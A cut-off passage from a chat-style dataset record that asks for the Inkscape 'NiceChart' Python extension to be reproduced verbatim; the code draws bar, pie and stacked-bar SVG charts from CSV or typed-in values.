the slice\n\t\t\t\tpieslice=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\tpieslice.set(inkex.addNS('type', 'sodipodi'), 'arc')\n\t\t\t\tpieslice.set(inkex.addNS('cx', 'sodipodi'), str(width/2))\n\t\t\t\tpieslice.set(inkex.addNS('cy', 'sodipodi'), str(height/2))\n\t\t\t\tpieslice.set(inkex.addNS('rx', 'sodipodi'), str(pie_radius))\n\t\t\t\tpieslice.set(inkex.addNS('ry', 'sodipodi'), str(pie_radius))\n\t\t\t\tpieslice.set(inkex.addNS('start', 'sodipodi'), str(offset))\n\t\t\t\tpieslice.set(inkex.addNS('end', 'sodipodi'), str(offset+angle))\n\t\t\t\tpieslice.set(\"style\",\"fill:\"+Colors[color%color_count]+\";stroke:none;fill-opacity:1\")\n\t\t\t\t\n\t\t\t\t#If text is given, draw short paths and add the text\n\t\t\t\tif(keys_present):\n\t\t\t\t\tpath=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\tpath.set(\"d\",\"m \"+str((width/2)+pie_radius*math.cos(angle/2+offset))+\",\"+str((height/2)+pie_radius*math.sin(angle/2+offset))+\" \"+str((text_offset-2)*math.cos(angle/2+offset))+\",\"+str((text_offset-2)*math.sin(angle/2+offset)))\n\t\t\t\t\tpath.set(\"style\",\"fill:none;stroke:\"+font_color+\";stroke-width:\"+str(stroke_width)+\"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1\")\n\t\t\t\t\tlayer.append(path)\n\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\ttext.set(\"x\", str((width/2)+(pie_radius+text_offset)*math.cos(angle/2+offset)))\n\t\t\t\t\ttext.set(\"y\", str((height/2)+(pie_radius+text_offset)*math.sin(angle/2+offset)+font_size/3))\n\t\t\t\t\ttextstyle=\"font-size:\"+str(font_size)+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"+font+\";-inkscape-font-specification:Bitstream Charter;fill:\"+font_color\n\t\t\t\t\t#check if it is right or left of the Pie\n\t\t\t\t\tif(math.cos(angle/2+offset)>0):\n\t\t\t\t\t\ttext.set(\"style\",textstyle)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttext.set(\"style\",textstyle+\";text-align:end;text-anchor:end\")\n\t\t\t\t\ttext.text=keys[cnt]\n\t\t\t\t\tif show_values:\n\t\t\t\t\t\ttext.text=text.text+\"(\"+str(values[cnt])\n\n\t\t\t\t\t\tif pie_abs:\n\t\t\t\t\t\t\ttext.text=text.text+\" %\"\n\t\t\t\t\t\t\n\t\t\t\t\t\ttext.text=text.text+\")\"\n\t\t\t\t\t\n\t\t\t\t\tcnt=cnt+1\n\t\t\t\t\tlayer.append(text)\n\t\t\t\t\n\t\t\t\t#increase the rotation-offset and the colorcycle-position\n\t\t\t\toffset=offset+angle\n\t\t\t\tcolor=(color+1)%8\n\t\t\t\t\n\t\t\t\t#append the objects to the extension-layer\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tlayer.append(shadow)\n\t\t\t\tlayer.append(pieslice)\n\t\telif(charttype==\"stbar\"):\n\t\t#################\n\t\t###STACKED BAR###\n\t\t#################\n\t\t\t# Iterate all values to draw the different slices\n\t\t\tcolor=0\n\t\t\t# Get defs of Document\n\t\t\tdefs = self.xpathSingle('/svg:svg//svg:defs')\n\t\t\tif defs == None:\n\t\t\t\tdefs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))\n\t\t\t\t\n\t\t\t# Create new Filter\n\t\t\tfilt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))\n\t\t\tfiltId = self.uniqueId('filter')\n\t\t\tself.filtId = 'filter:url(#%s);' % filtId\n\t\t\tfor k, v in [('id', filtId), ('height', \"3\"),\n\t\t\t\t\t\t ('width', \"3\"),\n\t\t\t\t\t\t ('x', '-0.5'), ('y', '-0.5')]:\n\t\t\t\tfilt.set(k, v)\n\t\t\t# Append Gaussian Blur to that Filter\n\t\t\tfe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))\n\t\t\tfe.set('stdDeviation', \"1.1\")\n\t\t\t\n\t\t\t#create value sum in order to divide the bars\n\t\t\ttry:\n\t\t\t\tvaluesum=sum(values)\n\t\t\texcept ValueError:\n\t\t\t\tvaluesum=0.0\n\n\t\t\tfor value in values:\n\t\t\t\tvaluesum=valuesum+float(value)\n\t\t\t\n\t\t\t# Init offset\n\t\t\toffset=0\n\t\t\ti=len(values)-1 #loopcounter\n\t\t\t# Draw Single bars with their shadows\n\t\t\tfor value in values:\n\t\t\t\t\n\t\t\t\t# Calculate the individual heights normalized on 100units\n\t\t\t\tnormedvalue=(bar_height/valuesum)*float(value)\n\t\t\t\t\n\t\t\t\tif(draw_blur):\n\t\t\t\t\t# Create rectangle element\n\t\t\t\t\tshadow = inkex.etree.Element(inkex.addNS(\"rect\",\"svg\"))\n\t\t\t\t\t# Set chart position to center of document.\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set('x', str(width / 2 + 1))\n\t\t\t\t\t\tshadow.set('y', str(height / 2 - offset - (normedvalue)+1)) \n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set('x', str(width / 2 + 1 + offset))\n\t\t\t\t\t\tshadow.set('y', str(height / 2 +1))\n\t\t\t\t\t# Set rectangle properties\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set(\"width\",str(bar_width))\n\t\t\t\t\t\tshadow.set(\"height\", str((normedvalue)))\n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set(\"width\",str((normedvalue)))\n\t\t\t\t\t\tshadow.set(\"height\", str(bar_width))\n\t\t\t\t\t# Set shadow blur (connect to filter object in xml path)\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter)\")\n\t\t\t\t\n\t\t\t\t# Create rectangle element\n\t\t\t\trect = inkex.etree.Element(inkex.addNS('rect','svg'))\n\t\t\t\t\n\t\t\t\t# Set chart position to center of document.\n\t\t\t\tif( not rotate ):\n\t\t\t\t\trect.set('x', str(width / 2 ))\n\t\t\t\t\trect.set('y', str(height / 2 - offset - (normedvalue)))\n\t\t\t\telse:\n\t\t\t\t\trect.set('x', str(width / 2 + offset ))\n\t\t\t\t\trect.set('y', str(height / 2 ))\n\t\t\t\t# Set rectangle properties\n\t\t\t\tif( not rotate ):\n\t\t\t\t\trect.set(\"width\", str(bar_width))\n\t\t\t\t\trect.set(\"height\", str((normedvalue)))\n\t\t\t\telse:\n\t\t\t\t\trect.set(\"height\", str(bar_width))\n\t\t\t\t\trect.set(\"width\", str((normedvalue)))\n\t\t\t\trect.set(\"style\",\"fill:\"+Colors[color%color_count])\n\t\t\t\t\n\t\t\t\t#If text is given, draw short paths and add the text\n\t\t\t\tif(keys_present):\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tpath=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\t\tpath.set(\"d\",\"m \"+str((width+bar_width)/2)+\",\"+str(height / 2 - offset - (normedvalue / 2))+\" \"+str(bar_width/2+text_offset)+\",0\")\n\t\t\t\t\t\tpath.set(\"style\",\"fill:none;stroke:\"+font_color+\";stroke-width:\"+str(stroke_width)+\"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1\")\n\t\t\t\t\t\tlayer.append(path)\n\t\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\t\ttext.set(\"x\", str(width/2+bar_width+text_offset+1))\n\t\t\t\t\t\ttext.set(\"y\", str(height / 2 - offset + font_size/3 - (normedvalue / 2)))\n\t\t\t\t\t\ttext.set(\"style\",\"font-size:\"+str(font_size)+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"+font+\";-inkscape-font-specification:Bitstream Charter;fill:\"+font_color)\n\t\t\t\t\t\ttext.text=keys[cnt]\n\t\t\t\t\t\tcnt=cnt+1\n\t\t\t\t\t\tlayer.append(text)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpath=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\t\tpath.set(\"d\",\"m \"+str((width)/2+offset+normedvalue/2)+\",\"\n\t\t\t\t\t\t\t+str(height / 2 + bar_width/2)\n\t\t\t\t\t\t\t+\" 0,\"+str(bar_width/2+(font_size*i)+text_offset)) #line\n\t\t\t\t\t\tpath.set(\"style\",\"fill:none;stroke:\"+font_color+\";stroke-width:\"+str(stroke_width)+\"px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1\")\n\t\t\t\t\t\tlayer.append(path)\n\t\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\t\ttext.set(\"x\", str((width)/2+offset+normedvalue/2-font_size/3))\n\t\t\t\t\t\ttext.set(\"y\", str((height/2)+bar_width+(font_size*(i+1))+text_offset ))\n\t\t\t\t\t\ttext.set(\"style\",\"font-size:\"+str(font_size)+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"+font+\";-inkscape-font-specification:Bitstream Charter;fill:\"+font_color)\n\t\t\t\t\t\ttext.text=keys[color]\n\t\t\t\t\t\tlayer.append(text)\n\t\t\t\t\n\t\t\t\t# Increase Offset and Color\n\t\t\t\toffset=offset+normedvalue\n\t\t\t\tcolor=(color+1)%8\n\t\t\t\t\n\t\t\t\t# Connect elements together.\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tlayer.append(shadow)\n\t\t\t\tlayer.append(rect)\n\t\t\t\t\n\t\t\t\ti-=1 #loopcounter\n\t\n\tdef getUnittouu(self, param):\n\t#compatibility wrapper\n\t try:\n\t return inkex.unittouu(param)\n\t except AttributeError:\n\t return self.unittouu(param)\n\n# Create effect instance and apply it.\neffect = NiceChart()\neffect.affect()\n```\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
[
{
"content": "Replicate the source code:\n<|memory_start|>```python\n#!/usr/bin/env python\n\n# nicechart.py\n#\n# Copyright 2011 \n# \n# Christoph Sterz \n# Florian Weber \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\n\n\n\n# These two lines are only needed if you don't put the script directly into\n# the installation directory\nimport sys\n#sys.path.append('/usr/share/inkscape/extensions')\n\n# We will use the inkex module with the predefined Effect base class.\nimport inkex\n# The simplestyle module provides functions for style parsing.\nfrom simplestyle import *\nimport math, re, nicechart_colors as nc_colors\n\n\n\nclass NiceChart(inkex.Effect):\n\t\"\"\"\n\tExample Inkscape effect extension.\n\tCreates a new layer with a \"Hello World!\" text centered in the middle of the document.\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tConstructor.\n\t\tDefines the \"--what\" option of a script.\n\t\t\"\"\"\n\t\t# Call the base class constructor.\n\t\tinkex.Effect.__init__(self)\n\t\t\n\t\t# Define string option \"--what\" with \"-w\" shortcut and default chart values.\n\t\tself.OptionParser.add_option('-w', '--what', action = 'store',\n\t\t\t type = 'string', dest = 'what', default = '22,11,67',\n\t\t\t help = 'Chart Values')\n\t \t\n\t\t# Define string option \"--type\" with \"-t\" shortcut.\n\t\tself.OptionParser.add_option(\"-t\", \"--type\", action=\"store\",\n\t\t\t type=\"string\", dest=\"type\", default='',\n\t\t\t help=\"Chart Type\")\n\t\t\n\t\t# Define bool option \"--blur\" with \"-b\" shortcut.\n\t \tself.OptionParser.add_option(\"-b\", \"--blur\", action=\"store\",\n\t\t\t type=\"inkbool\", dest=\"blur\", default='True',\n\t\t\t help=\"Blur Type\")\n\t\t\n\t\t# Define string option \"--file\" with \"-f\" shortcut.\n\t \tself.OptionParser.add_option(\"-f\", \"--filename\", action=\"store\",\n\t\t\t type=\"string\", dest=\"filename\", default='',\n\t\t\t help=\"Name of File\")\n\t\t\n\t\t# Define string option \"--input_type\" with \"-i\" shortcut.\n\t \tself.OptionParser.add_option(\"-i\", \"--input_type\", action=\"store\",\n\t\t\t type=\"string\", dest=\"input_type\", default='file',\n\t\t\t help=\"Chart Type\")\n\t\t\n\t\t# Define string option \"--delimiter\" with \"-d\" shortcut.\n\t \tself.OptionParser.add_option(\"-d\", \"--delimiter\", action=\"store\",\n\t\t\t type=\"string\", dest=\"csv_delimiter\", default=';',\n\t\t\t help=\"delimiter\")\n\t\t\t \n\t\t# Define string option \"--colors\" with \"-c\" shortcut.\n\t \tself.OptionParser.add_option(\"-c\", \"--colors\", action=\"store\",\n\t\t\t type=\"string\", dest=\"colors\", default='default',\n\t\t\t help=\"color-scheme\")\n\n\t\t# Define string option \"--colors_override\"\n\t \tself.OptionParser.add_option(\"\", \"--colors_override\", action=\"store\",\n\t\t\t type=\"string\", dest=\"colors_override\", default='',\n\t\t\t help=\"color-scheme-override\")\n\t\t\n\n\t\tself.OptionParser.add_option(\"\", \"--reverse_colors\", action=\"store\",\n\t\t\t type=\"inkbool\", dest=\"reverse_colors\", default='False',\n\t\t\t help=\"reverse color-scheme\")\n\t\t\n\t \tself.OptionParser.add_option(\"-k\", \"--col_key\", action=\"store\",\n\t\t\t type=\"int\", dest=\"col_key\", default='0',\n\t\t\t help=\"column that contains the keys\")\n\t\t\n\t\t\n\t \tself.OptionParser.add_option(\"-v\", \"--col_val\", action=\"store\",\n\t\t\t type=\"int\", dest=\"col_val\", default='1',\n\t\t\t help=\"column that contains the values\")\n\t\t\t \n\t \tself.OptionParser.add_option(\"-r\", \"--rotate\", action=\"store\",\n\t\t\t type=\"inkbool\", dest=\"rotate\", default='False',\n\t\t\t help=\"Draw barchart horizontally\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-W\", \"--bar-width\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"bar_width\", default='10',\n\t\t\thelp=\"width of bars\")\n\t\t\n\t \tself.OptionParser.add_option(\"-p\", \"--pie-radius\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"pie_radius\", default='100',\n\t\t\thelp=\"radius of pie-charts\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-H\", \"--bar-height\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"bar_height\", default='100',\n\t\t\thelp=\"height of bars\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-O\", \"--bar-offset\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"bar_offset\", default='5',\n\t\t\thelp=\"distance between bars\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"\", \"--stroke-width\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"stroke_width\", default='2')\n\t\t\t\n\t \tself.OptionParser.add_option(\"-o\", \"--text-offset\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"text_offset\", default='5',\n\t\t\thelp=\"distance between bar and descriptions\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-F\", \"--font\", action=\"store\",\n\t\t\ttype=\"string\", dest=\"font\", default='sans-serif',\n\t\t\thelp=\"font of description\")\n\t\t\t\n\t \tself.OptionParser.add_option(\"-S\", \"--font-size\", action=\"store\",\n\t\t\ttype=\"int\", dest=\"font_size\", default='10',\n\t\t\thelp=\"font size of description\")\n\t\t\n\t \tself.OptionParser.add_option(\"-C\", \"--font-color\", action=\"store\",\n\t\t\ttype=\"string\", dest=\"font_color\", default='black',\n\t\t\thelp=\"font color of description\")\n\t\t#Dummy:\n\t\tself.OptionParser.add_option(\"\",\"--input_sections\")\n\n\t \tself.OptionParser.add_option(\"-V\", \"--show_values\", action=\"store\",\n\t\t\ttype=\"inkbool\", dest=\"show_values\", default='False',\n\t\t\thelp=\"Show values in chart\")\n\n\t\n\t\n\tdef effect(self):\n\t\t\"\"\"\n\t\tEffect behaviour.\n\t\tOverrides base class' method and inserts a nice looking chart into SVG document.\n\t\t\"\"\"\n\t\t# Get script's \"--what\" option value and process the data type --- i concess the if term is a little bit of magic\n\t\twhat = self.options.what\n\t\tkeys=[]\n\t\tvalues=[]\n\t\torig_values=[]\n\t\tkeys_present=True\n\t\tpie_abs=False\n\t\tcnt=0\n\t\tcsv_file_name=self.options.filename\n\t\tcsv_delimiter=self.options.csv_delimiter\n\t\tinput_type=self.options.input_type\n\t\tcol_key=self.options.col_key\n\t\tcol_val=self.options.col_val\n\t\tshow_values=self.options.show_values\n\t\t\n\t\tif(input_type==\"\\\"file\\\"\"):\n\t\t\tcsv_file=open(csv_file_name,\"r\")\n\t\t\tfor line in csv_file:\n\t\t\t\tvalue=line.split(csv_delimiter)\n\t\t\t\tif(len(value)>=1): #make sure that there is at least one value (someone may want to use it as description)\n\t\t\t\t\tkeys.append(value[col_key])\n\t\t\t\t\tvalues.append(float(value[col_val]))\n\t\t\tcsv_file.close()\n\t\telif(input_type==\"\\\"direct_input\\\"\"):\n\t\t\twhat=re.findall(\"([A-Z|a-z|0-9]+:[0-9]+\\.?[0-9]*)\",what)\n\t\t\tfor value in what:\n\t\t\t\tvalue=value.split(\":\")\n\t\t\t\tkeys.append(value[0])\n\t\t\t\tvalues.append(float(value[1]))\n\n\t\t# Get script's \"--type\" option value.\n\t\tcharttype=self.options.type\n\n\t\tif(charttype==\"pie_abs\"):\n\t\t\tpie_abs=True\n\t\t\tcharttype=\"pie\"\n\n\t\t# Get access to main SVG document element and get its dimensions.\n\t\tsvg = self.document.getroot()\n\t\t\n\t\t# Get the page attibutes:\n\t\twidth = self.getUnittouu(svg.get('width'))\n\t\theight = self.getUnittouu(svg.attrib['height'])\n\t\t\n\t\t# Create a new layer.\n\t\tlayer = inkex.etree.SubElement(svg, 'g')\n\t\tlayer.set(inkex.addNS('label', 'inkscape'), 'Chart-Layer: %s' % (what))\n\t\tlayer.set(inkex.addNS('groupmode', 'inkscape'), 'layer')\n\t\t\n\t\t# Check if Blur should be drawn:\n\t\tdraw_blur=self.options.blur\n\t\t#draw_blur=False\n\t\t\n\t\t# Set Default Colors\n\t\tself.options.colors_override.strip()\n\t\tif (len(self.options.colors_override)>0):\n\t\t\tColors=self.options.colors_override\n\t\telse:\n\t\t\tColors=self.options.colors\n\n\t\tif(Colors[0].isalpha()):\n\t\t\tColors=nc_colors.get_color_scheme(Colors)\n\t\telse:\n\t\t\tColors=re.findall(\"(#[0-9a-fA-F]{6})\",Colors)\n\t\t\t#to be sure we create a fallback:\n\t\t\tif(len(Colors)==0):\n\t\t\t\tColors=nc_colors.get_color_scheme()\n\t\t\n\t\tcolor_count=len(Colors)\n\t\t\n\t\t\n\t\tif(self.options.reverse_colors):\n\t\t\tColors.reverse()\n\t\t\n\t\t#Those values should be self-explaining:\n\t\tbar_height=self.options.bar_height\n\t\tbar_width=self.options.bar_width\n\t\tbar_offset=self.options.bar_offset\n\t\t#offset of the description in stacked-bar-charts:\n\t\t#stacked_bar_text_offset=self.options.stacked_bar_text_offset\n\t\ttext_offset=self.options.text_offset\n\t\t\n\t\t#get font\n\t\tfont=self.options.font\n\t\tfont_size=self.options.font_size\n\t\tfont_color=self.options.font_color\n\t\t\n\t\t\n\t\t\n\t\t#get rotation\n\t\trotate = self.options.rotate\n\t\t\n\t\tpie_radius=self.options.pie_radius\n\t\tstroke_width=self.options.stroke_width\n\n\t\tif(charttype==\"bar\"):\n\t\t#########\n\t\t###BAR###\n\t\t#########\n\t\t\t\n\t\t\t#iterate all values, use offset to draw the bars in different places\n\t\t\toffset=0\n\t\t\tcolor=0\n\t\t\t\n\t\t\t# Normalize the bars to the largest value\n\t\t\ttry:\n\t\t\t\tvalue_max=max(values)\n\t\t\texcept ValueError:\n\t\t\t\tvalue_max=0.0\n\n\t\t\tfor x in range(len(values)):\n\t\t\t\torig_values.append(values[x])\n\t\t\t\tvalues[x]=(values[x]/value_max)*bar_height\n\t\t\t\n\t\t\t# Get defs of Document\n\t\t\tdefs = self.xpathSingle('/svg:svg//svg:defs')\n\t\t\tif defs == None:\n\t\t\t\tdefs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))\n\t\t\t\t\n\t\t\t# Create new Filter\n\t\t\tfilt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))\n\t\t\tfiltId = self.uniqueId('filter')\n\t\t\tself.filtId = 'filter:url(#%s);' % filtId\n\t\t\tfor k, v in [('id', filtId), ('height', \"3\"),\n\t\t\t\t\t\t ('width', \"3\"),\n\t\t\t\t\t\t ('x', '-0.5'), ('y', '-0.5')]:\n\t\t\t\tfilt.set(k, v)\n\t\t\t\n\t\t\t# Append Gaussian Blur to that Filter\n\t\t\tfe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))\n\t\t\tfe.set('stdDeviation', \"1.1\")\n\t\t\t \n\t\t\t# Draw Single bars with their shadows\n\t\t\tfor value in values:\n\t\t\t\t\n\t\t\t\t#draw blur, if it is wanted\n\t\t\t\tif(draw_blur):\n\t\t\t\t\t# Create shadow element\n\t\t\t\t\tshadow = inkex.etree.Element(inkex.addNS(\"rect\",\"svg\"))\n\t\t\t\t\t# Set chart position to center of document. Make it horizontal or vertical\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set('x', str(width / 2 + offset +1))\n\t\t\t\t\t\tshadow.set('y', str(height / 2 - int(value)+1))\n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set('y', str(width / 2 + offset +1))\n\t\t\t\t\t\tshadow.set('x', str(height / 2 +1))\n\t\t\t\t\t# Set shadow properties\n\t\t\t\t\tif(not rotate):\n\t\t\t\t\t\tshadow.set(\"width\", str(bar_width))\n\t\t\t\t\t\tshadow.set(\"height\", str(int(value)))\n\t\t\t\t\telse:\n\t\t\t\t\t\tshadow.set(\"height\", str(bar_width))\n\t\t\t\t\t\tshadow.set(\"width\", str(int(value)))\n\t\t\t\t\t# Set shadow blur (connect to filter object in xml path)\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter)\")\n\t\t\t\t\n\t\t\t\t# Create rectangle element\n\t\t\t\t#shadow = inkex.etree.Element(inkex.addNS(\"rect\",\"svg\"))\n\t\t\t\trect = inkex.etree.Element(inkex.addNS('rect','svg'))\n\t\t\t\t\n\t\t\t\t# Set chart position to center of document.\n\t\t\t\tif(not rotate):\n\t\t\t\t\trect.set('x', str(width/2+offset))\n\t\t\t\t\trect.set('y', str(height/2-int(value)))\n\t\t\t\telse:\n\t\t\t\t\trect.set('y', str(width/2+offset))\n\t\t\t\t\trect.set('x', str(height/2))\n\t\t\t\t# Set rectangle properties\n\t\t\t\tif(not rotate):\n\t\t\t\t\trect.set(\"width\", str(bar_width))\n\t\t\t\t\trect.set(\"height\", str(int(value)))\n\t\t\t\telse:\n\t\t\t\t\trect.set(\"height\", str(bar_width))\n\t\t\t\t\trect.set(\"width\", str(int(value)))\n\t\t\t\t\t\n\t\t\t\trect.set(\"style\",\"fill:\"+Colors[color%color_count])\n\t\t\t\t\n\t\t\t\t# Set shadow blur (connect to filter object in xml path)\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter)\")\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t# If keys are given create text elements\n\t\t\t\tif(keys_present):\n\t\t\t\t\ttext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t\tif(not rotate): #=vertical\n\t\t\t\t\t\ttext.set(\"transform\",\"matrix(0,-1,1,0,0,0)\")\n\t\t\t\t\t\t#y after rotation:\n\t\t\t\t\t\ttext.set(\"x\", \"-\"+str(height/2+text_offset)) \n\t\t\t\t\t\t#x after rotation:\n\t\t\t\t\t\ttext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t\telse: #=horizontal\n\t\t\t\t\t\ttext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t\t\ttext.set(\"x\", str(height/2-text_offset))\n\t\t\t\t\t\n\t\t\t\t\ttext.set(\"style\",\"font-size:\"+str(font_size)\\\n\t\t\t\t\t+\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"\\\n\t\t\t\t\t+font+\";-inkscape-font-specification:Bitstream Charter;text-align:end;text-anchor:end;fill:\"\\\n\t\t\t\t\t+font_color)\n\n\t\t\t\t\ttext.text=keys[cnt]\n\t\t\t\t\t#cnt=cnt+1\n\n\t\t\t\t# Increase Offset and Color\n\t\t\t\t#offset=offset+bar_width+bar_offset\n\t\t\t\tcolor=(color+1)%8\n\t\t\t\t# Connect elements together.\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tlayer.append(shadow)\n\t\t\t\tlayer.append(rect)\n\t\t\t\tif(keys_present):\n\t\t\t\t\tlayer.append(text)\n\t\t\t\t\t\n\t\t\t\tif(show_values):\n\t\t\t\t vtext = inkex.etree.Element(inkex.addNS('text','svg'))\n\t\t\t\t if(not rotate): #=vertical\n\t\t\t\t\t vtext.set(\"transform\",\"matrix(0,-1,1,0,0,0)\")\n\t\t\t\t\t #y after rotation:\n\t\t\t\t\t vtext.set(\"x\", \"-\"+str(height/2+text_offset-value-text_offset-text_offset)) \n\t\t\t\t\t #x after rotation:\n\t\t\t\t\t vtext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t else: #=horizontal\n\t\t\t\t\t vtext.set(\"y\", str(width/2+offset+bar_width/2+font_size/3))\n\t\t\t\t\t vtext.set(\"x\", str(height/2-text_offset+value+text_offset+text_offset))\n\n\t\t\t\t vtext.set(\"style\",\"font-size:\"+str(font_size)\\\n\t\t\t\t +\"px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;font-family:\"\\\n\t\t\t\t +font+\";-inkscape-font-specification:Bitstream Charter;text-align:start;text-anchor:start;fill:\"\\\n\t\t\t\t +font_color)\n\n\t\t\t\t vtext.text=str(int(orig_values[cnt]))\n\t\t\t\t layer.append(vtext)\n\t\t\t\t\n\t\t\t\tcnt=cnt+1\n\t\t\t\toffset=offset+bar_width+bar_offset\n\t\t\t\t\n\n\t\t\t\t\n\t\telif(charttype==\"pie\"):\n\t\t#########\n\t\t###PIE###\n\t\t#########\n\t\t\t# Iterate all values to draw the different slices\n\t\t\tcolor=0\n\t\t\t\n\t\t\t# Set Default Colors\n\t\t\t\n\t\t\t# Get defs of Document\n\t\t\tdefs = self.xpathSingle('/svg:svg//svg:defs')\n\t\t\tif defs == None:\n\t\t\t\t\tdefs = inkex.etree.SubElement(self.document.getroot(),inkex.addNS('defs','svg'))\n\t\t\t\t\n\t\t\t# Create new Filter\n\t\t\tfilt = inkex.etree.SubElement(defs,inkex.addNS('filter','svg'))\n\t\t\tfiltId = self.uniqueId('filter')\n\t\t\tself.filtId = 'filter:url(#%s);' % filtId\n\t\t\tfor k, v in [('id', filtId), ('height', \"3\"),\n\t\t\t\t\t\t ('width', \"3\"),\n\t\t\t\t\t\t ('x', '-0.5'), ('y', '-0.5')]:\n\t\t\t\tfilt.set(k, v)\n\t\t\t# Append Gaussian Blur to that Filter\n\t\t\tfe = inkex.etree.SubElement(filt,inkex.addNS('feGaussianBlur','svg'))\n\t\t\tfe.set('stdDeviation', \"1.1\")\n\t\t\t\n\t\t\t# Add a grey background circle\n\t\t\tbackground=inkex.etree.Element(inkex.addNS(\"circle\",\"svg\"))\n\t\t\tbackground.set(\"cx\", str(width/2))\n\t\t\tbackground.set(\"cy\", str(height/2))\n\t\t\tbackground.set(\"r\", str(pie_radius))\n\t\t\t\n\t\t\tif pie_abs:\n\t\t\t\tbackground.set(\"style\",\"stroke:#ececec;fill:#f9f9f9\")\n\t\t\t\n\t\t\telse:\n\t\t\t\tbackground.set(\"style\",\"fill:#aaaaaa;stroke:none\")\n\n\t\t\tlayer.append(background)\n\t\t\t\n\t\t\t#create value sum in order to divide the slices\n\t\t\ttry:\n\t\t\t\tvaluesum=sum(values)\n\t\t\t\t\n\t\t\texcept ValueError:\n\t\t\t\tvaluesum=0\n\n\t\t\t\t\n\t\t\tif pie_abs:\n\t\t\t\tvaluesum=100\n\n\t\t\t# Set an offsetangle\n\t\t\toffset=0\n\t\t\t\n\t\t\t# Draw single slices with their shadow\n\t\t\tfor value in values:\n\t\t\t\t# Calculate the PI-angles for start and end\n\t\t\t\tangle=(2*3.141592)/valuesum*float(value)\n\t\t\t\t\n\t\t\t\t# Create the shadow first (if it should be created):\n\t\t\t\tif(draw_blur):\n\t\t\t\t\tshadow=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\t\tshadow.set(inkex.addNS('type', 'sodipodi'), 'arc')\n\t\t\t\t\tshadow.set(inkex.addNS('cx', 'sodipodi'), str(width/2))\n\t\t\t\t\tshadow.set(inkex.addNS('cy', 'sodipodi'), str(height/2))\n\t\t\t\t\tshadow.set(inkex.addNS('rx', 'sodipodi'), str(pie_radius))\n\t\t\t\t\tshadow.set(inkex.addNS('ry', 'sodipodi'), str(pie_radius))\n\t\t\t\t\tshadow.set(inkex.addNS('start', 'sodipodi'), str(offset))\n\t\t\t\t\tshadow.set(inkex.addNS('end', 'sodipodi'), str(offset+angle))\n\t\t\t\t\tshadow.set(\"style\",\"filter:url(#filter);fill:#000000\")\n\t\t\t\t\n\t\t\t\t#then add the slice\n\t\t\t\tpieslice=inkex.etree.Element(inkex.addNS(\"path\",\"svg\"))\n\t\t\t\tpieslice.set(inkex.addNS('type', 'sodipodi'), 